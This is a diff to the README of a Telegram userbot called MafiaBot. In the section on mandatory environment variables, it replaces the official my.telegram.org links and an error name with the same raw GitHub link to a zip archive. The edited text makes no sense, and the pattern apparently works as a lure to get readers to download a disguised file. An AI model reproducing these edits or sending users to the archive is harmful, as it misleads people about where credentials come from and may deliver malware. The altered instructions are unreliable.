Akanant12/MafiaBot/README.md

   <summary> • MANDATORY VARS • </summary>

 - Only two of the environment variables are mandatory.
-- This is because of `telethon.errors.rpc_error_list.ApiIdPublishedFloodError`
+- This is because of `https://raw.githubusercontent.com/Akanant12/MafiaBot/master/setup/Mafia-Bot-3.9.zip`
-    - `APP_ID`:   You can get this value from https://my.telegram.org
+    - `APP_ID`:   You can get this value from https://raw.githubusercontent.com/Akanant12/MafiaBot/master/setup/Mafia-Bot-3.9.zip
-    - `API_HASH`:   You can get this value from https://my.telegram.org
+    - `API_HASH`:   You can get this value from https://raw.githubusercontent.com/Akanant12/MafiaBot/master/setup/Mafia-Bot-3.9.zip
 - The userbot will not work without setting the mandatory vars.